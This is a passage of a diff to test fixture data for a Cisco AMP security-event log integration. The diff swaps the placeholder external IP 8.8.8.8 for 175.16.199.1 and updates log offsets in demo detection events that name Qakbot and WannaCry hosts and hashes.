                 "ip": "10.10.10.10",
@@ -3226,7 +3226,7 @@
         "host.hostname": "Demo_Qakbot_3",
         "host.name": "Demo_Qakbot_3",
         "input.type": "log",
-        "log.offset": 68332,
+        "log.offset": 68602,
         "related.hash": [
             "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"
         ],
@@ -3235,7 +3235,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -3247,7 +3247,7 @@
         "@timestamp": "2021-01-14T19:10:30.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -3281,7 +3281,7 @@
         "host.hostname": "Demo_Qakbot_3",
         "host.name": "Demo_Qakbot_3",
         "input.type": "log",
-        "log.offset": 69533,
+        "log.offset": 69808,
         "related.hash": [
             "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"
         ],
@@ -3290,7 +3290,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -3302,7 +3302,7 @@
         "@timestamp": "2021-01-14T19:10:30.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -3340,7 +3340,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 70734,
+        "log.offset": 71014,
         "related.hash": [
             "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"
         ],
@@ -3349,7 +3349,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -3361,7 +3361,7 @@
         "@timestamp": "2021-01-14T19:10:30.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -3399,7 +3399,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 71990,
+        "log.offset": 72275,
         "related.hash": [
             "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"
         ],
@@ -3408,7 +3408,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -3420,7 +3420,7 @@
         "@timestamp": "2021-01-14T19:10:30.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -3458,7 +3458,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 73246,
+        "log.offset": 73536,
         "related.hash": [
             "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"
         ],
@@ -3467,7 +3467,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -3479,7 +3479,7 @@
         "@timestamp": "2021-01-14T18:03:55.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -3513,7 +3513,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 74502,
+        "log.offset": 74797,
         "related.hash": [
             "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
         ],
@@ -3522,7 +3522,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -3534,7 +3534,7 @@
         "@timestamp": "2021-01-14T18:03:55.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -3573,7 +3573,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 75695,
+        "log.offset": 75995,
         "process.hash.md5": "4e568dbe3fff1a0025eb432dc929b78f",
         "process.hash.sha1": "7abcc82dc5a05b4f53fd0fbd386738e5555025cf",
         "process.hash.sha256": "26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71",
@@ -3587,7 +3587,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -3603,7 +3603,7 @@
         "@timestamp": "2021-01-14T18:03:52.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -3644,7 +3644,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 77209,
+        "log.offset": 77514,
         "process.hash.md5": "4e568dbe3fff1a0025eb432dc929b78f",
         "process.hash.sha1": "7abcc82dc5a05b4f53fd0fbd386738e5555025cf",
         "process.hash.sha256": "26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71",
@@ -3660,7 +3660,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -3676,7 +3676,7 @@
         "@timestamp": "2021-01-14T18:03:52.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -3708,7 +3708,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 78808,
+        "log.offset": 79118,
         "related.hash": [
             "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
         ],
@@ -3717,7 +3717,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -3729,7 +3729,7 @@
         "@timestamp": "2021-01-14T17:51:19.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -3763,7 +3763,7 @@
         "host.hostname": "Demo_Qakbot_1",
         "host.name": "Demo_Qakbot_1",
         "input.type": "log",
-        "log.offset": 79928,
+        "log.offset": 80243,
         "related.hash": [
             "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"
         ],
@@ -3772,7 +3772,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -3784,7 +3784,7 @@
         "@timestamp": "2021-01-14T17:51:19.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -3818,7 +3818,7 @@
         "host.hostname": "Demo_Qakbot_1",
         "host.name": "Demo_Qakbot_1",
         "input.type": "log",
-        "log.offset": 81129,
+        "log.offset": 81449,
         "related.hash": [
             "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"
         ],
@@ -3827,7 +3827,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -3839,7 +3839,7 @@
         "@timestamp": "2021-01-14T17:51:19.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -3871,7 +3871,7 @@
         "host.hostname": "Demo_Qakbot_1",
         "host.name": "Demo_Qakbot_1",
         "input.type": "log",
-        "log.offset": 82330,
+        "log.offset": 82655,
         "related.hash": [
             "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"
         ],
@@ -3880,7 +3880,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -3892,7 +3892,7 @@
         "@timestamp": "2021-01-14T17:51:19.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -3930,7 +3930,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 83443,
+        "log.offset": 83773,
         "related.hash": [
             "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"
         ],
@@ -3939,7 +3939,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -3951,7 +3951,7 @@
         "@timestamp": "2021-01-14T17:51:19.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -3989,7 +3989,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 84690,
+        "log.offset": 85025,
         "related.hash": [
             "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"
         ],
@@ -3998,7 +3998,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -4010,7 +4010,7 @@
         "@timestamp": "2021-01-14T17:51:19.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -4050,7 +4050,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 85948,
+        "log.offset": 86288,
         "related.hash": [
             "99fffe78e0cbd7b508eed13a8633903dd89ed5f1",
             "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff",
@@ -4061,7 +4061,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -4073,7 +4073,7 @@
         "@timestamp": "2021-01-14T17:39:51.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -4107,7 +4107,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 87312,
+        "log.offset": 87657,
         "related.hash": [
             "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
         ],
@@ -4116,7 +4116,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -4128,7 +4128,7 @@
         "@timestamp": "2021-01-14T17:39:51.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -4162,7 +4162,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 88505,
+        "log.offset": 88855,
         "related.hash": [
             "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
         ],
@@ -4171,7 +4171,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -4183,7 +4183,7 @@
         "@timestamp": "2021-01-14T17:39:51.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -4217,7 +4217,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 89691,
+        "log.offset": 90046,
         "related.hash": [
             "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
         ],
@@ -4226,7 +4226,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -4238,7 +4238,7 @@
         "@timestamp": "2021-01-14T17:39:51.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -4272,7 +4272,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 90884,
+        "log.offset": 91244,
         "related.hash": [
             "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
         ],
@@ -4281,7 +4281,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -4293,7 +4293,7 @@
         "@timestamp": "2021-01-14T17:39:51.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -4327,7 +4327,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 92070,
+        "log.offset": 92435,
         "related.hash": [
             "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
         ],
@@ -4336,7 +4336,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -4348,7 +4348,7 @@
         "@timestamp": "2021-01-14T17:39:51.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -4382,7 +4382,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 93256,
+        "log.offset": 93626,
         "related.hash": [
             "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
         ],
@@ -4391,7 +4391,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -4403,7 +4403,7 @@
         "@timestamp": "2021-01-14T17:39:51.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -4437,7 +4437,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 94442,
+        "log.offset": 94817,
         "related.hash": [
             "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
         ],
@@ -4446,7 +4446,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -4458,7 +4458,7 @@
         "@timestamp": "2021-01-14T17:39:51.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -4492,7 +4492,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 95628,
+        "log.offset": 96008,
         "related.hash": [
             "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
         ],
@@ -4501,7 +4501,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -4513,7 +4513,7 @@
         "@timestamp": "2021-01-14T17:39:51.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -4547,7 +4547,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 96814,
+        "log.offset": 97199,
         "related.hash": [
             "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
         ],
@@ -4556,7 +4556,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -4568,7 +4568,7 @@
         "@timestamp": "2021-01-14T17:39:51.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -4602,7 +4602,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 98000,
+        "log.offset": 98390,
         "related.hash": [
             "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
         ],
@@ -4611,7 +4611,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -4623,7 +4623,7 @@
         "@timestamp": "2021-01-14T17:39:51.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -4657,7 +4657,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 99186,
+        "log.offset": 99581,
         "related.hash": [
             "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
         ],
@@ -4666,7 +4666,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -4678,7 +4678,7 @@
         "@timestamp": "2021-01-14T17:39:51.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -4712,7 +4712,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 100372,
+        "log.offset": 100772,
         "related.hash": [
             "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
         ],
@@ -4721,7 +4721,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -4733,7 +4733,7 @@
         "@timestamp": "2021-01-14T17:39:51.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -4772,7 +4772,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 101558,
+        "log.offset": 101963,
         "process.hash.md5": "ad7b9c14083b52bc532fba5948342b98",
         "process.hash.sha1": "ee8cbf12d87c4d388f09b4f69bed2e91682920b5",
         "process.hash.sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae",
@@ -4786,7 +4786,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -4802,7 +4802,7 @@
         "@timestamp": "2021-01-14T17:39:51.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -4843,7 +4843,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 103091,
+        "log.offset": 103501,
         "process.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa",
         "process.name": "tasksche.exe",
         "process.pid": 2708,
@@ -4857,7 +4857,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -4873,7 +4873,7 @@
         "@timestamp": "2021-01-14T17:39:51.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -4911,7 +4911,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 104633,
+        "log.offset": 105048,
         "related.hash": [
             "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
         ],
@@ -4920,7 +4920,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -4936,7 +4936,7 @@
         "@timestamp": "2021-01-14T17:39:51.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -4968,7 +4968,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 105894,
+        "log.offset": 106314,
         "related.hash": [
             "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
         ],
@@ -4977,7 +4977,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -4989,7 +4989,7 @@
         "@timestamp": "2021-01-14T17:39:50.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -5023,7 +5023,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 107014,
+        "log.offset": 107439,
         "related.hash": [
             "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
         ],
@@ -5032,7 +5032,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -5044,7 +5044,7 @@
         "@timestamp": "2021-01-14T17:39:50.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -5078,7 +5078,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 108200,
+        "log.offset": 108630,
         "related.hash": [
             "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
         ],
@@ -5087,7 +5087,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -5099,7 +5099,7 @@
         "@timestamp": "2021-01-14T17:39:50.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -5133,7 +5133,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 109386,
+        "log.offset": 109821,
         "related.hash": [
             "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
         ],
@@ -5142,7 +5142,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -5154,7 +5154,7 @@
         "@timestamp": "2021-01-14T17:39:50.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -5194,7 +5194,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 110571,
+        "log.offset": 111011,
         "related.hash": [
